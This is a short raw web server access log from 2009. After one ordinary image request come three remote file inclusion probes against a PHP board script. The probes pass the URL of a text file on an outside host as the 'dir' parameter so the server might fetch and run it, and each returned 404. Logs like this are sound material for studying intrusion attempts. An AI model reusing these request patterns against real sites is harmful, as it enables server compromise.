121.169.189.169 - - [12/Aug/2009:05:19:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010E9B409E15F60044B3091+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
195.155.232.36 - - [12/Aug/2009:05:19:31 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:19:31 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.155.232.36 - - [12/Aug/2009:05:19:31 -0400] "GET /logs/access_log.Q109080100//bbs//skin/ggambo7002_board/write.php?dir=http://www.fepro-technik.de/redaxo/include/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
